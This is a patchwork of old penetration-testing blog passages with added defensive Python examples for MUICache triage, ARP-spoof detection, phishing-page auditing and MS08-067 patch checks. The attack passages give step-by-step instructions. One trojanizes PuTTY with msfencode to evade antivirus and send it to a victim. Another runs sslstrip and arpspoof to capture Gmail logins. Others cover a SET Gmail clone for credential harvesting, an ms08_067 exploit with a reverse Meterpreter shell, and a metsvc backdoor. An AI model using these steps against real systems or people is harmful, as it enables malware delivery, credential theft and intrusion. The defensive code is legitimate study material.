This module gathers information about the files and file paths that logged-on users have executed on the system, and also checks whether each file still exists on the system. The information is taken from the MUICache registry key. If the user is logged in when the module runs, it collects the MUICache entries by reading the registry directly. If the user is not logged in, the module downloads the user's registry hive (NTUSER.DAT/UsrClass.dat) from the system and parses the MUICache contents from the downloaded hive.
msf > use post/windows/gather/enum_muicache
msf post(enum_muicache) > sessions
...sessions...
msf post(enum_muicache) > set SESSION <session-id>
msf post(enum_muicache) > show options
...show and set options...
msf post(enum_muicache) > run
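The same MUICache data is useful on the defensive side: during incident response it tells you what a user actually launched, and entries whose binary has since been deleted or that point into Temp/Downloads are common traces of post-exploitation tooling. The following is an added example, not code from the Metasploit module above. It assumes the raw (value name, data) pairs have already been read from the MUICache key or a parsed NTUSER.DAT by some other means, and it assumes the value-name layouts described in the comments; the sample entries and the paths under Temp and Downloads are constructed.

```python
import os
import re
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# Value-name layout assumed here: on Windows 7 and later the MuiCache key under
# HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
# stores "<exe path>.FriendlyAppName" / "<exe path>.ApplicationCompany"; on XP
# (HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache) the value name is the
# bare path and the data is the friendly name. Values such as LangID are not paths.
_SUFFIXES = (".FriendlyAppName", ".ApplicationCompany")
_DRIVE_PATH = re.compile(r"^[A-Za-z]:\\")

# Launch locations that deserve a second look during triage (a hit is a lead,
# not proof of compromise).
_SUSPICIOUS_DIRS = (
    "\\appdata\\local\\temp\\",
    "\\downloads\\",
    "\\users\\public\\",
    "\\programdata\\",
    "\\windows\\temp\\",
)

@dataclass
class MuiEntry:
    path: str
    friendly_name: Optional[str]
    exists: bool       # still on disk? deleted tools are a classic post-exploitation trace
    suspicious: bool   # launched from a user-writable or temp location

def parse_value_name(name: str) -> Optional[str]:
    """Return the executable path encoded in a MUICache value name, or None."""
    for suffix in _SUFFIXES:
        if name.lower().endswith(suffix.lower()):
            return name[: -len(suffix)]
    return name if _DRIVE_PATH.match(name) else None

def is_suspicious(path: str) -> bool:
    low = path.lower()
    return any(d in low for d in _SUSPICIOUS_DIRS)

def triage(values: Iterable[Tuple[str, object]],
           exists: Callable[[str], bool] = os.path.exists) -> List[MuiEntry]:
    """Turn raw (value name, data) pairs from the MUICache key into triage rows."""
    entries: Dict[str, MuiEntry] = {}
    for name, data in values:
        path = parse_value_name(name)
        if path is None:
            continue
        entry = entries.setdefault(
            path.lower(), MuiEntry(path, None, bool(exists(path)), is_suspicious(path)))
        if name == path or name.lower().endswith(".friendlyappname"):
            entry.friendly_name = str(data)
    return list(entries.values())

# Constructed sample, as it might come out of a parsed NTUSER.DAT.
SAMPLE_VALUES = [
    ("LangID", b"\x09\x04"),
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe.FriendlyAppName", "Firefox"),
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe.ApplicationCompany", "Mozilla"),
    ("C:\\Users\\alice\\AppData\\Local\\Temp\\putty.exe.FriendlyAppName", "PuTTY"),
    ("C:\\Users\\alice\\Downloads\\nc.exe.FriendlyAppName", "nc"),
]
# Stand-in for os.path.exists so the sample runs on any OS: only these "remain on disk".
_STILL_ON_DISK = {"c:\\program files\\mozilla firefox\\firefox.exe",
                  "c:\\users\\alice\\downloads\\nc.exe"}

def sample_exists(path: str) -> bool:
    return path.lower() in _STILL_ON_DISK

if __name__ == "__main__":
    for e in triage(SAMPLE_VALUES, exists=sample_exists):
        flag = "SUSPICIOUS" if e.suspicious else "ok"
        print(f"{flag:10} exists={e.exists!s:5} {e.path} ({e.friendly_name})")
```

On a live Windows host you would pass the real `os.path.exists`; when working from a hive copied off the machine, pass a function that checks against a file listing taken at the same time, otherwise "missing" only means "not on the analyst's box".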
Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.
After going through all the hard work of exploiting a system, it's often a good idea to leave yourself an easier way back into the system later. This way, if the service you exploited is down or patched, you can still gain access to the system. This is where Alexander Sotirov's 'metsvc' comes in handy and was recently added to the Metasploit trunk. To read about the original implementation of metsvc, go to http://www.phreedom.org/software/metsvc/
Using this backdoor, you can gain a Meterpreter shell at any point.
One word of warning here before we go any further. Metsvc as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk. In a real world situation, you would either alter the source to require authentication, or filter out remote connections to the port through some other method.
How to bypass internet security using msfpayload and msfencode
I have posted many articles on Windows hacking using Metasploit, trojans, etc.
Today I am going to show you how to hack Windows using PuTTY.
First you must encode PuTTY with Metasploit to bypass antivirus, and then set a payload in PuTTY for the connection to the victim machine.
Now send this encoded PuTTY file to the victim. When the victim opens the tool, the payload sets up a connection between the attacker machine and the victim machine, and the encoding is used to bypass antivirus, so the antivirus does not detect the virus in PuTTY.
You get a Meterpreter shell in Metasploit on your machine, so you can do anything on your victim's machine using the Meterpreter shell.
You can install a trojan (netcat), sniff passwords (Firefox, Windows logon, etc.), add a new user account, etc.
This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.
In my case: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 7777
This command redirects all traffic on port 80 to port 7777.
Step 3: Now it is time to run sslstrip.
Path: /pentest/web/sslstrip
./sslstrip.py -l <listenPort> -w <txt file name>
In my case:
sslstrip.py -l 7777 -w mitm
The -w option writes all data to one text file.
Step 4: Don't close this terminal. Open a new terminal and run arpspoof to sniff data from the victim PC on the network.
Run arpspoof to convince the network that it should send its traffic to you:
arpspoof -i <interface> -t <targetIP> <gatewayIP>
In my case: arpspoof -i eth1 -t 192.168.1.102 192.168.1.1
ON THE VICTIM MACHINE
If the command succeeds, the victim PC's ARP table is changed by arpspoof,
so you can sniff the victim's data.
When the victim accesses his/her Gmail account,
the Gmail site opens, but this Gmail site is not the real one; it only looks like the real site. The one difference: the real Gmail site is HTTPS, but this one is HTTP.
When your victim enters his/her Gmail credentials in this fake Gmail website, arpspoof sniffs the credentials and sslstrip reads them and writes them to a text file in your /pentest/web/sslstrip.
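From the defender's side, the step above leaves a visible footprint on the victim: the gateway's IP suddenly resolves to a different MAC, and that MAC now answers for more than one IP. The following added example (not part of the original post or of sslstrip/arpspoof) parses two ARP-cache snapshots in Linux `arp -n` format and raises an alert on exactly those two conditions. The snapshots and MAC addresses are constructed; the IPs are the ones used in the walkthrough above.

```python
import re
from typing import Dict, List

# Constructed ARP-cache snapshots in `arp -n` (Linux) format. The first is a
# clean baseline; in the second, the gateway 192.168.1.1 resolves to the MAC
# that 192.168.1.103 already had, which is what ARP poisoning looks like from
# the victim's cache. The MAC addresses are made up.
BASELINE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:11:22:33:44:55   C                     eth0
192.168.1.103            ether   aa:bb:cc:dd:ee:ff   C                     eth0
"""
POISONED = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   aa:bb:cc:dd:ee:ff   C                     eth0
192.168.1.103            ether   aa:bb:cc:dd:ee:ff   C                     eth0
"""

# One cache row: IP, hardware type, MAC. Rows marked "(incomplete)" have no MAC
# and are skipped on purpose.
_ROW = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+\S+\s+([0-9a-fA-F:]{17})\b")

def parse_arp_table(text: str) -> Dict[str, str]:
    """Map IP -> lower-cased MAC from `arp -n` output."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def detect_arp_spoof(baseline: Dict[str, str], current: Dict[str, str],
                     gateway_ip: str) -> List[str]:
    """Alert when the gateway's MAC changes or one MAC claims several IPs."""
    alerts: List[str] = []
    old, new = baseline.get(gateway_ip), current.get(gateway_ip)
    if old and new and old != new:
        alerts.append(f"gateway {gateway_ip} MAC changed {old} -> {new}")
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in current.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return alerts

if __name__ == "__main__":
    for a in detect_arp_spoof(parse_arp_table(BASELINE), parse_arp_table(POISONED), "192.168.1.1"):
        print("ALERT:", a)
```

In practice the baseline is the gateway's MAC recorded when the host was known-good (or a static ARP entry for it), and the "current" table is re-read on a short interval; the duplicate-MAC rule also catches poisoning of hosts other than the gateway.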
SET is a menu-driven attack system, which is fairly unique when it comes to hacker tools. The decision not to make it command-line based was made because of how social-engineering attacks occur: they require multiple scenarios, options, and customizations. If the tool had been command-line based, it would have severely limited the effectiveness of the attacks and the ability to fully customize them for your target. Let's dive into the menu and do a brief walkthrough of each attack vector.
Social Engineer Toolkit (SET)-Credential Harvester Attack
Step 1: First open a terminal and go to the following path:
cd /pentest/exploit/set
Press Enter, then type ./set to open the Social Engineer Toolkit; its menu then appears.
Step 2: Select option 1, Social-Engineering Attacks, from the SET toolkit menu.
A new menu now opens in SET.
Step 3: Select option 2, Website Attack Vectors.
The web attack vector is used by performing phishing attacks against the victim in hopes they click the link. There is a wide-variety of attacks that can occur once they click. We will dive into each one of the attacks later on.
The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.
A new menu now opens in SET.
Step 5: Select option 2, Site Cloner.
A new menu now opens in SET.
Step 6: Now enter the target URL you want to clone, e.g. https://gmail.com,
and press Enter.
The Credential Harvester is now running on port 80. The attacker PC is ready for the attack.
Now give your victim this URL: http://<your ip address>/
In my case:
http://192.168.1.103/
ON THE VICTIM PC
When your victim enters the URL http://192.168.1.103/, the web browser opens the Gmail website, but this is a fake site made by the SET toolkit.
When your victim enters his/her Gmail credentials in this fake website, the fake website sends the credentials to the attacker PC.
You have your victim's Gmail credentials. :D
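Both the sslstrip walkthrough and the SET clone above end with the same tell-tale: a login form that is reached over plain HTTP and posts to a host that is not the legitimate one (the clone posts back to the attacker's machine, here 192.168.1.103). The following added example (not part of the original post or of SET) is a small page audit that a phishing-triage or user-awareness tool could run: it parses the HTML with the standard library, finds every form containing a password field, resolves its action URL, and reports plain-HTTP or foreign-host submission. The legitimate page URL `https://mail.example.com/login`, the hostname, and both HTML fragments are constructed.

```python
from html.parser import HTMLParser
from typing import List, Optional
from urllib.parse import urljoin, urlsplit

class _FormScanner(HTMLParser):
    """Collect every form that contains a password field, with its action URL."""
    def __init__(self) -> None:
        super().__init__()
        self.forms: List[dict] = []
        self._current: Optional[dict] = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            if self._current["has_password"]:
                self.forms.append(self._current)
            self._current = None

def audit_login_page(page_url: str, html: str, expected_host: str) -> List[str]:
    """Return findings (empty list = nothing wrong) for a login page."""
    findings: List[str] = []
    page = urlsplit(page_url)
    if page.scheme != "https":
        findings.append(f"page itself served over {page.scheme}")
    if page.hostname != expected_host:
        findings.append(f"page host {page.hostname!r} is not {expected_host!r}")
    scanner = _FormScanner()
    scanner.feed(html)
    for form in scanner.forms:
        # A relative action ("/", "/login") resolves against the page URL, so a
        # cloned page served from the attacker's IP posts straight back to it.
        target = urlsplit(urljoin(page_url, form["action"]))
        if target.scheme != "https":
            findings.append(f"password form posts over {target.scheme} to {target.geturl()}")
        if target.hostname != expected_host:
            findings.append(f"password form posts to foreign host {target.hostname!r}")
    return findings

# Constructed samples: a legitimate HTTPS login page and a clone served from the
# harvester's address used in the walkthrough above.
LEGIT_URL = "https://mail.example.com/login"
LEGIT_HTML = """<form method="post" action="/login">
<input name="user"><input type="password" name="pass"></form>"""
CLONE_URL = "http://192.168.1.103/"
CLONE_HTML = """<form method="post" action="/">
<input name="user"><input type="password" name="pass"></form>"""

if __name__ == "__main__":
    for url, html in ((LEGIT_URL, LEGIT_HTML), (CLONE_URL, CLONE_HTML)):
        print(url, audit_login_page(url, html, "mail.example.com") or ["clean"])
```

The host check is what matters against a clone: a cloned page can copy the markup perfectly, but it cannot be served from the real domain over a valid certificate, which is also why HSTS on the real site blunts both the sslstrip and the harvester variant for returning users.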
In this article I will show you how to use the ms08_067_netapi exploit against an unpatched Windows XP machine to gain access to it. The original name of the exploit is "Microsoft Server Service Relative Path Stack Corruption". This exploit helps bypass NX on various operating systems and service packs. Before we jump into the actual exploitation process, I would suggest taking some time to look at the exploit code here.
Step 1 - First of all, turn on your BackTrack 5 virtual machine.
Step 2 - Next, on your console type "msfconsole". This will load the Metasploit Framework.
Step 3 - Next, type "use windows/smb/ms08_067_netapi" in the console.
Step 4 - Now that the exploit has been selected, you need to enter the RHOST; RHOST refers to the IP address of the victim. You can get the Windows host's IP by issuing the "ipconfig" command in its command prompt.
Step 5 - Once the exploit is set up, it's time to set up a payload. In this case we will use windows/meterpreter/reverse_tcp; set it in the shell. Next you need to set the proper LHOST (the attacker's IP address) by issuing the command "set lhost <IP address>".
Step 6 - Next, issue the command "show options" to check whether everything is set up correctly.
Step 7 - Once you are done with the assessment, just type "exploit" in the console.
If the exploit succeeds, you get a Meterpreter shell on your BackTrack PC.
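The exploit above only works against a host that never received the security update for MS08-067, so the defensive counterpart is a patch check. The following added example (not from the original article or from Metasploit) parses the hotfix list from `systeminfo` output and reports which required bulletins are missing. The mapping of MS08-067 to security update KB958644 is a known fact not stated on the page; the `systeminfo` excerpt and the other hotfix IDs in it are constructed.

```python
import re
from typing import Dict, List

# Constructed excerpt of `systeminfo` output from a Windows XP SP3 host. Only
# the fields this check reads are included; KB999901/KB999902 are made up.
SAMPLE_SYSTEMINFO = """\
Host Name:                 XP-LAB
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB999901
                           [02]: KB999902
"""

# Bulletin -> security update that closes it. MS08-067 was fixed by KB958644
# (known fact, not from the page).
REQUIRED_HOTFIXES: Dict[str, str] = {"MS08-067": "KB958644"}

_FIELD = re.compile(r"^([A-Za-z() ]+?):\s+(.*)$")
_HOTFIX = re.compile(r"^\s*\[\d+\]:\s*(KB\d+)", re.IGNORECASE)

def parse_systeminfo(text: str) -> Dict[str, object]:
    """Collect top-level 'Field: value' pairs plus the set of installed KB IDs."""
    info: Dict[str, object] = {"hotfixes": set()}
    for line in text.splitlines():
        m = _HOTFIX.match(line)
        if m:
            info["hotfixes"].add(m.group(1).upper())
            continue
        m = _FIELD.match(line)
        if m:
            info[m.group(1).strip()] = m.group(2).strip()
    return info

def missing_bulletins(info: Dict[str, object],
                      required: Dict[str, str] = REQUIRED_HOTFIXES) -> List[str]:
    """Bulletins whose update is absent from the parsed hotfix list, sorted."""
    installed = info.get("hotfixes", set())
    return sorted(b for b, kb in required.items() if kb.upper() not in installed)

if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["OS Name"], info["OS Version"])
    print("missing:", missing_bulletins(info) or "none")
```

A missing entry is a strong signal but not the whole story: the hotfix list only reflects updates installed through Windows Update or the standalone installer, so on hosts rebuilt from an old image or with a corrupted update history, confirm by also checking the version of the patched netapi32.dll, and keep TCP 445 filtered from untrusted networks regardless.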